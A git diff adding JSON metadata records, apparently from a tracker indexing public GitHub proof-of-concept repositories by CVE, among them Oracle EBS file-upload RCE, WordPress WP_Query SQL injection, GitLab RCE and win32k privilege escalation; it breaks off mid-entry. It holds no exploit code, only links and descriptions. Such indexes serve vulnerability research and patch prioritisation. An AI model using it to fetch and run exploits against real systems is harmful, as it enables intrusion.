+ }, + { + "id": 609134090, + "name": "CVE-2022-21587-Oracle-EBS-", + "full_name": "sahabrifki\/CVE-2022-21587-Oracle-EBS-", + "owner": { + "login": "sahabrifki", + "id": 26023743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26023743?v=4", + "html_url": "https:\/\/github.com\/sahabrifki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahabrifki\/CVE-2022-21587-Oracle-EBS-", + "description": "This script is used for automating exploit for Oracle Ebussiness (EBS) for CVE 2022-21587 ( Unauthenticated File Upload For Remote Code Execution)", + "fork": false, + "created_at": "2023-03-03T12:56:58Z", + "updated_at": "2024-08-14T19:39:32Z", + "pushed_at": "2023-03-03T13:12:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21658.json b/2022/CVE-2022-21658.json new file mode 100644 index 0000000000..5961557bf1 --- /dev/null +++ b/2022/CVE-2022-21658.json @@ -0,0 +1,37 @@ +[ + { + "id": 450374545, + "name": "cve-2022-21658", + "full_name": "sagittarius-a\/cve-2022-21658", + "owner": { + "login": "sagittarius-a", + "id": 8809698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8809698?v=4", + "html_url": "https:\/\/github.com\/sagittarius-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sagittarius-a\/cve-2022-21658", + "description": "POC for cve-2022-21658", + "fork": false, + "created_at": "2022-01-21T06:09:16Z", + "updated_at": "2023-10-03T02:34:46Z", + "pushed_at": "2022-01-21T06:09:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21658", + "poc", + "rust" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21660.json b/2022/CVE-2022-21660.json new file mode 100644 index 0000000000..c305307d50 --- /dev/null +++ b/2022/CVE-2022-21660.json @@ -0,0 +1,64 @@ +[ + { + "id": 446296593, + "name": "Gin-Vue-admin-poc-CVE-2022-21660", + "full_name": "UzJu\/Gin-Vue-admin-poc-CVE-2022-21660", + "owner": { + "login": "UzJu", + "id": 50813806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813806?v=4", + "html_url": "https:\/\/github.com\/UzJu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UzJu\/Gin-Vue-admin-poc-CVE-2022-21660", + "description": "CVE-2022-21660", + "fork": false, + "created_at": "2022-01-10T05:50:35Z", + "updated_at": "2024-08-19T12:18:08Z", + "pushed_at": "2022-01-10T05:52:03Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462232980, + "name": "CVE-2022-21660", + "full_name": "UzJu\/CVE-2022-21660", + "owner": { + "login": "UzJu", + "id": 50813806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813806?v=4", + "html_url": "https:\/\/github.com\/UzJu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UzJu\/CVE-2022-21660", + "description": null, + "fork": false, + "created_at": "2022-02-22T09:50:09Z", + "updated_at": "2022-02-22T09:50:09Z", + "pushed_at": "2022-02-22T09:50:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21661.json b/2022/CVE-2022-21661.json new file mode 100644 index 0000000000..9c5efeafa3 --- /dev/null +++ b/2022/CVE-2022-21661.json @@ -0,0 +1,410 @@ +[ + { + "id": 449096712, + "name": "CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection", + "full_name": "TAPESH-TEAM\/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection", + "owner": { + "login": "TAPESH-TEAM", + "id": 83407483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83407483?v=4", + "html_url": "https:\/\/github.com\/TAPESH-TEAM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAPESH-TEAM\/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection", + "description": "WordPress Core 5.8.2 - 'WP_Query' SQL Injection", + "fork": false, + "created_at": "2022-01-18T01:05:04Z", + "updated_at": "2024-02-27T10:37:01Z", + "pushed_at": "2023-06-04T09:55:51Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 458502807, + "name": "wordpress-CVE-2022-21661", + "full_name": "purple-WL\/wordpress-CVE-2022-21661", + "owner": { + "login": "purple-WL", + "id": 63894044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63894044?v=4", + "html_url": "https:\/\/github.com\/purple-WL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/purple-WL\/wordpress-CVE-2022-21661", + "description": null, + "fork": false, + "created_at": "2022-02-12T11:31:26Z", + "updated_at": "2023-04-09T00:06:15Z", + "pushed_at": "2022-02-17T03:59:18Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497289034, + "name": "Wordpress-cve-CVE-2022-21661", + "full_name": "0x4E0x650x6F\/Wordpress-cve-CVE-2022-21661", + "owner": { + "login": "0x4E0x650x6F", + "id": 1144303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1144303?v=4", + "html_url": "https:\/\/github.com\/0x4E0x650x6F", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4E0x650x6F\/Wordpress-cve-CVE-2022-21661", + "description": "Wordpress 5.8.2 CVE-2022-21661 Vuln enviroment POC exploit", + "fork": false, + "created_at": "2022-05-28T10:46:48Z", + "updated_at": "2024-07-07T20:48:49Z", + "pushed_at": "2022-05-28T10:50:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 518852189, + "name": "CVE-2022-21661", + "full_name": "z92g\/CVE-2022-21661", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-21661", + "description": "WordPress WP_Query SQL Injection POC", + "fork": false, + "created_at": "2022-07-28T13:12:51Z", + "updated_at": "2024-11-16T19:50:56Z", + "pushed_at": "2023-03-11T16:01:39Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 29, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 519762222, + "name": "CVE-2022-21661", + "full_name": "guestzz\/CVE-2022-21661", + "owner": { + "login": "guestzz", + "id": 45824588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45824588?v=4", + "html_url": "https:\/\/github.com\/guestzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guestzz\/CVE-2022-21661", + "description": "CVE-2022-21661 exp for Elementor custom skin.", + "fork": false, + "created_at": "2022-07-31T11:53:06Z", + "updated_at": "2024-05-28T15:23:11Z", + "pushed_at": "2022-08-02T03:09:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563211004, + "name": "CVE-2022-21661", + "full_name": "safe3s\/CVE-2022-21661", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-21661", + "description": "The first poc video presenting the sql injection test from ( WordPress Core 5.8.2-'WP_Query' \/ CVE-2022-21661) ", + "fork": false, + "created_at": "2022-11-08T06:10:49Z", + "updated_at": "2022-11-07T04:28:00Z", + "pushed_at": "2022-11-06T21:43:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 588582544, + "name": "SSI-CVE-2022-21661", + "full_name": "WellingtonEspindula\/SSI-CVE-2022-21661", + "owner": { + "login": "WellingtonEspindula", + "id": 16787873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16787873?v=4", + "html_url": "https:\/\/github.com\/WellingtonEspindula", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WellingtonEspindula\/SSI-CVE-2022-21661", + "description": "Study and exploit the vulnerability CVE-2022-21661 that allows SQL Injections through plugins POST requests to WordPress versions below 5.8.3.", + "fork": false, + "created_at": "2023-01-13T13:31:34Z", + "updated_at": "2024-10-22T07:08:42Z", + "pushed_at": "2023-11-30T14:51:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21661", + "exploit", + "pof", + "security" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 598931701, + "name": "CVE-2022-21661-Demo", + "full_name": "daniel616\/CVE-2022-21661-Demo", + "owner": { + "login": "daniel616", + "id": 26915500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26915500?v=4", + "html_url": "https:\/\/github.com\/daniel616", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daniel616\/CVE-2022-21661-Demo", + "description": "Demonstration of the SQL injection vulnerability in wordpress 5.8.2", + "fork": false, + "created_at": "2023-02-08T04:58:57Z", + "updated_at": "2024-02-03T11:46:18Z", + "pushed_at": "2023-05-10T01:10:08Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633180220, + "name": "CVE-2022-21661-PoC", + "full_name": "sealldeveloper\/CVE-2022-21661-PoC", + "owner": { + "login": "sealldeveloper", + "id": 120470330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4", + "html_url": "https:\/\/github.com\/sealldeveloper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2022-21661-PoC", + "description": "A Python PoC of CVE-2022-21661, inspired from z92g's Go PoC", + "fork": false, + "created_at": "2023-04-27T00:36:16Z", + "updated_at": "2024-09-09T18:01:25Z", + "pushed_at": "2023-04-27T00:50:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739025859, + "name": "CVE-2022-21661", + "full_name": "p4ncontomat3\/CVE-2022-21661", + "owner": { + "login": "p4ncontomat3", + "id": 52469263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52469263?v=4", + "html_url": "https:\/\/github.com\/p4ncontomat3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p4ncontomat3\/CVE-2022-21661", + "description": "Script to validate WordPress CVE-2022-21661", + "fork": false, + "created_at": "2024-01-04T15:49:00Z", + "updated_at": "2024-01-04T15:52:21Z", + "pushed_at": "2024-01-04T15:53:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776679745, + "name": "WordPress--CVE-2022-21661", + "full_name": "CharonDefalt\/WordPress--CVE-2022-21661", + "owner": { + "login": "CharonDefalt", + "id": 103410775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103410775?v=4", + "html_url": "https:\/\/github.com\/CharonDefalt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CharonDefalt\/WordPress--CVE-2022-21661", + "description": null, + "fork": false, + "created_at": "2024-03-24T07:03:35Z", + "updated_at": "2024-03-24T07:03:35Z", + "pushed_at": "2024-03-24T07:03:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887277471, + "name": "CVE-2022-21661", + "full_name": "w0r1i0g1ht\/CVE-2022-21661", + "owner": { + "login": "w0r1i0g1ht", + "id": 78846391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78846391?v=4", + "html_url": "https:\/\/github.com\/w0r1i0g1ht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0r1i0g1ht\/CVE-2022-21661", + "description": "CVE-2022-21661 docker and poc", + "fork": false, + "created_at": "2024-11-12T13:23:12Z", + "updated_at": "2024-11-12T13:30:16Z", + "pushed_at": "2024-11-12T13:30:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887747640, + "name": "cve-2022-21661", + "full_name": "kittypurrnaz\/cve-2022-21661", + "owner": { + "login": "kittypurrnaz", + "id": 115413009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115413009?v=4", + "html_url": "https:\/\/github.com\/kittypurrnaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kittypurrnaz\/cve-2022-21661", + "description": null, + "fork": false, + "created_at": "2024-11-13T08:05:30Z", + "updated_at": "2024-11-16T23:18:36Z", + "pushed_at": "2024-11-16T23:18:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21668.json b/2022/CVE-2022-21668.json new file mode 100644 index 0000000000..d820ba831b --- /dev/null +++ b/2022/CVE-2022-21668.json @@ -0,0 +1,33 @@ +[ + { + "id": 474484235, + "name": "CVE-2022-21668-Pipenv-RCE-vulnerability", + "full_name": "sreeram281997\/CVE-2022-21668-Pipenv-RCE-vulnerability", + "owner": { + "login": "sreeram281997", + "id": 53993620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53993620?v=4", + "html_url": "https:\/\/github.com\/sreeram281997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sreeram281997\/CVE-2022-21668-Pipenv-RCE-vulnerability", + "description": null, + "fork": false, + "created_at": "2022-03-26T22:50:36Z", + "updated_at": "2022-03-28T01:27:30Z", + "pushed_at": "2022-03-27T03:42:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21724.json b/2022/CVE-2022-21724.json new file mode 100644 index 0000000000..00c8e7785c --- /dev/null +++ b/2022/CVE-2022-21724.json @@ -0,0 +1,33 @@ +[ + { + "id": 825609977, + "name": "CVE-2022-21724", + "full_name": "ToontjeM\/CVE-2022-21724", + "owner": { + "login": "ToontjeM", + "id": 98271783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98271783?v=4", + "html_url": "https:\/\/github.com\/ToontjeM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ToontjeM\/CVE-2022-21724", + "description": null, + "fork": false, + "created_at": "2024-07-08T07:13:55Z", + "updated_at": "2024-07-08T07:13:59Z", + "pushed_at": "2024-07-08T07:13:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21728.json b/2022/CVE-2022-21728.json new file mode 100644 index 0000000000..b72030a565 --- /dev/null +++ b/2022/CVE-2022-21728.json @@ -0,0 +1,33 @@ +[ + { + "id": 486782625, + "name": "CVE-2022-21728-test", + "full_name": "mwina\/CVE-2022-21728-test", + "owner": { + "login": "mwina", + "id": 44265324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44265324?v=4", + "html_url": "https:\/\/github.com\/mwina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mwina\/CVE-2022-21728-test", + "description": null, + "fork": false, + "created_at": "2022-04-28T23:56:58Z", + "updated_at": "2022-04-29T00:00:12Z", + "pushed_at": "2022-04-29T00:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21789.json b/2022/CVE-2022-21789.json new file mode 100644 index 0000000000..c92f566588 --- /dev/null +++ b/2022/CVE-2022-21789.json @@ -0,0 +1,33 @@ +[ + { + "id": 496040044, + "name": "CVE-2022-21789", + "full_name": "docfate111\/CVE-2022-21789", + "owner": { + "login": "docfate111", + "id": 24590069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24590069?v=4", + "html_url": "https:\/\/github.com\/docfate111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/docfate111\/CVE-2022-21789", + "description": null, + "fork": false, + "created_at": "2022-05-25T01:20:14Z", + "updated_at": "2022-08-16T02:00:20Z", + "pushed_at": "2022-08-16T02:01:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21839.json b/2022/CVE-2022-21839.json new file mode 100644 index 0000000000..938fc0b226 --- /dev/null +++ b/2022/CVE-2022-21839.json @@ -0,0 +1,33 @@ +[ + { + "id": 587390406, + "name": "CVE-2022-21839-", + "full_name": "lolin19\/CVE-2022-21839-", + "owner": { + "login": "lolin19", + "id": 104766804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104766804?v=4", + "html_url": "https:\/\/github.com\/lolin19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lolin19\/CVE-2022-21839-", + "description": null, + "fork": false, + "created_at": "2023-01-10T16:34:02Z", + "updated_at": "2023-01-10T16:34:02Z", + "pushed_at": "2023-01-10T16:42:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2185.json b/2022/CVE-2022-2185.json new file mode 100644 index 0000000000..f76c0f1f68 --- /dev/null +++ b/2022/CVE-2022-2185.json @@ -0,0 +1,64 @@ +[ + { + "id": 509694771, + "name": "CVE-2022-2185-poc", + "full_name": "safe3s\/CVE-2022-2185-poc", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-2185-poc", + "description": "CVE-2022-2185 poc", + "fork": false, + "created_at": "2022-07-02T07:58:01Z", + "updated_at": "2024-04-10T07:50:47Z", + "pushed_at": "2022-07-12T16:35:30Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 519186045, + "name": "CVE-2022-2185", + "full_name": "ESUAdmin\/CVE-2022-2185", + "owner": { + "login": "ESUAdmin", + "id": 69588341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69588341?v=4", + "html_url": "https:\/\/github.com\/ESUAdmin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ESUAdmin\/CVE-2022-2185", + "description": "wo ee cve-2022-2185 gitlab authenticated rce", + "fork": false, + "created_at": "2022-07-29T11:14:03Z", + "updated_at": "2024-11-16T19:49:53Z", + "pushed_at": "2022-07-29T11:28:59Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 78, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21877.json b/2022/CVE-2022-21877.json new file mode 100644 index 0000000000..2153ee3696 --- /dev/null +++ b/2022/CVE-2022-21877.json @@ -0,0 +1,33 @@ +[ + { + "id": 456710810, + "name": "cve-2022-21877", + "full_name": "Big5-sec\/cve-2022-21877", + "owner": { + "login": "Big5-sec", + "id": 29749118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29749118?v=4", + "html_url": "https:\/\/github.com\/Big5-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Big5-sec\/cve-2022-21877", + "description": "a demonstration PoC for CVE-2022-21877 (storage spaces controller memory leak)", + "fork": false, + "created_at": "2022-02-07T23:18:17Z", + "updated_at": "2023-11-23T03:06:36Z", + "pushed_at": "2022-02-08T22:53:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21881.json b/2022/CVE-2022-21881.json new file mode 100644 index 0000000000..a2872b46e4 --- /dev/null +++ b/2022/CVE-2022-21881.json @@ -0,0 +1,33 @@ +[ + { + "id": 522979595, + "name": "CVE-2022-21881", + "full_name": "theabysslabs\/CVE-2022-21881", + "owner": { + "login": "theabysslabs", + "id": 110839037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110839037?v=4", + "html_url": "https:\/\/github.com\/theabysslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theabysslabs\/CVE-2022-21881", + "description": "POC of CVE-2022-21881 exploited at TianfuCup 2021 to escape Chrome Sandbox", + "fork": false, + "created_at": "2022-08-09T14:16:40Z", + "updated_at": "2024-08-12T20:26:01Z", + "pushed_at": "2022-08-09T14:28:48Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21882.json b/2022/CVE-2022-21882.json new file mode 100644 index 0000000000..7b4e7f5a95 --- /dev/null +++ b/2022/CVE-2022-21882.json @@ -0,0 +1,192 @@ +[ + { + "id": 452529582, + "name": "CVE-2022-21882", + "full_name": "KaLendsi\/CVE-2022-21882", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2022-21882", + "description": "win32k LPE ", + "fork": false, + "created_at": "2022-01-27T03:44:10Z", + "updated_at": "2024-11-23T23:29:14Z", + "pushed_at": "2022-01-27T04:18:18Z", + "stargazers_count": 460, + "watchers_count": 460, + "has_discussions": false, + "forks_count": 134, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 134, + "watchers": 460, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 454493738, + "name": "CVE-2022-21882", + "full_name": "David-Honisch\/CVE-2022-21882", + "owner": { + "login": "David-Honisch", + "id": 35835504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35835504?v=4", + "html_url": "https:\/\/github.com\/David-Honisch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/David-Honisch\/CVE-2022-21882", + "description": "CVE-2022-21882", + "fork": false, + "created_at": "2022-02-01T17:58:29Z", + "updated_at": "2024-01-02T10:31:49Z", + "pushed_at": "2022-02-01T18:14:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 455137692, + "name": "CVE-2022-21882", + "full_name": "L4ys\/CVE-2022-21882", + "owner": { + "login": "L4ys", + "id": 5360374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5360374?v=4", + "html_url": "https:\/\/github.com\/L4ys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L4ys\/CVE-2022-21882", + "description": null, + "fork": false, + "created_at": "2022-02-03T11:25:14Z", + "updated_at": "2024-11-10T10:54:56Z", + "pushed_at": "2022-02-04T02:20:47Z", + "stargazers_count": 194, + "watchers_count": 194, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 194, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 456348360, + "name": "cve-2022-21882-poc", + "full_name": "sailay1996\/cve-2022-21882-poc", + "owner": { + "login": "sailay1996", + "id": 16739401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4", + "html_url": "https:\/\/github.com\/sailay1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sailay1996\/cve-2022-21882-poc", + "description": "lpe poc for cve-2022-21882 ", + "fork": false, + "created_at": "2022-02-07T03:45:36Z", + "updated_at": "2024-08-12T20:20:23Z", + "pushed_at": "2022-02-07T03:49:37Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21882", + "privilege-escalation", + "windows-exploitation" + ], + "visibility": "public", + "forks": 18, + "watchers": 47, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 459331281, + "name": "CVE-2022-21882", + "full_name": "r1l4-i3pur1l4\/CVE-2022-21882", + "owner": { + "login": "r1l4-i3pur1l4", + "id": 76409019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4", + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2022-21882", + "description": null, + "fork": false, + "created_at": "2022-02-14T21:28:15Z", + "updated_at": "2024-05-13T04:15:01Z", + "pushed_at": "2022-02-15T08:29:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630777901, + "name": "CVE-2022-21882", + "full_name": "dishfwk\/CVE-2022-21882", + "owner": { + "login": "dishfwk", + "id": 131247034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131247034?v=4", + "html_url": 